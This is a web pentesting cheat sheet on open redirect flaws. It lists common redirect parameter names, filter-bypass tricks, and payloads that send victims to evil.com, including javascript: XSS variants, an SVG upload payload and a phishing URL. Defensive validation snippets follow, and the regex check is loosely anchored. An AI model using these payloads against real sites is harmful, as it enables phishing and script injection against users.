Open Redirect

Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

Basic info - Open Redirect

Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

How to find entry points to test?

  • Burp Proxy history & Burp Sitemap (look at URLs with parameters)

  • Google dorking. E.g: inurl:redirectUrl=http site:target.com

  • Functionalities usually associated with redirects:

    • Login, Logout, Register & Password reset pages

    • Change site language

    • Links in emails

  • Read JavaScript code

  • Bruteforcing

    • Look for hidden redirect parameters, for e.g.:

    • /redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

    • /?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

Responses to look for when fuzzing


Tips

  • Try using the same parameter twice: ?next=whitelisted.com&next=google.com

  • If periods filtered, use an IPv4 address in decimal notation http://www.geektools.com/geektools-cgi/ipconv.cgi

  • Try a double-URL and triple-URL encoded version of payloads

  • Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal

  • For XSS, try replacing alert(1) with prompt(1) & confirm(1)

  • If extension checked, try ?image_url={payload}/.jpg

  • Try target.com/?redirect_url=.uk (or [any_param]=.uk). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.

  • Use /U+e280 RIGHT-TO-LEFT OVERRIDE: https://whitelisted.com@%E2%80%[email protected]


Identifying Open Redirect Vulnerabilities

Common Parameters to Test

Many applications use redirection parameters like:

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
u=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com

If these parameters are processed without validation, they might be vulnerable.

Passive Detection

  1. Check URL parameters – Look for redirect-related keywords in URLs.

  2. Analyze HTTP responses – Look for 302 Found or 301 Moved Permanently responses.

  3. Check developer console (F12) and network traffic – Inspect redirects.

Active Testing (Manual and Automated)

  • Modify the URL and inject external domains:

    https://example.com/login?redirect=https://evil.com
  • Using Burp Suite's Intruder to fuzz redirection parameters.

  • Using tools like Oralyzer:

    python3 oralyzer.py -u "https://example.com?redirect="

Exploiting Open Redirect Vulnerabilities

Basic Open Redirect Exploitation

If an application blindly trusts user input, you can redirect a victim to a malicious website:

https://example.com/login?redirect=http://evil.com

or use encoded URLs:

https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com

Redirect to Localhost (Bypass Authentication)

If an application allows redirection to localhost:

https://example.com/login?redirect=http://127.0.0.1

It can be used to:

  • Redirect an admin panel login to an internal resource.

  • Exploit internal APIs (in SSRF attacks).

URL Format Bypass

Some applications attempt to restrict external domains but allow different URL formats:

https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//[email protected]
  • //evil.com is a shorthand for https://evil.com.

  • @trusted.com is ignored by some browsers.


Open Redirect to XSS

Some browsers allow JavaScript-based redirects if improperly filtered.

Basic Payloads

javascript:alert(1)

or bypassing javascript filters:

java%0d%0ascript%0d%0a:alert(0)

Using Comments and Encoding

javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0

SVG File Exploit (Open Redirect via File Upload)

Some applications allow uploading SVG files that can trigger JavaScript execution:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>

If the website automatically loads SVG files, the redirection will be triggered.


Exploiting Open Redirect for Phishing

Attackers can craft realistic-looking URLs to trick users:

https://bank.com?redirect=https://bank.com.evil.com

Users might not notice the difference and enter their credentials.


Tools for Automating Open Redirect Testing

Oralyzer (Automated Open Redirect Scanner)

Fuzzing with Payload Lists


Defense Against Open Redirects

Input Validation

  • Only allow whitelisted domains for redirection:

    allowed_domains = ["mysafedomain.com"]
    if parsed_url.netloc not in allowed_domains:
        return "Invalid redirect URL"

Use Relative URLs Instead of Absolute

Instead of:

header("Location: ".$_GET['redirect']);

Use:

header("Location: /dashboard");

URL Sanitization

Ensure the redirect URL starts with a trusted domain:

if (!preg_match("/^https:\/\/mysafedomain\.com/", $_GET['redirect'])) {
    die("Invalid redirect URL");
}

Code examples

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://www.verylazytech.com");

PHP

<?php
/* browser redirections*/
header("Location: http://www.verylazytech.com");
exit;
?>

Last updated

Was this helpful?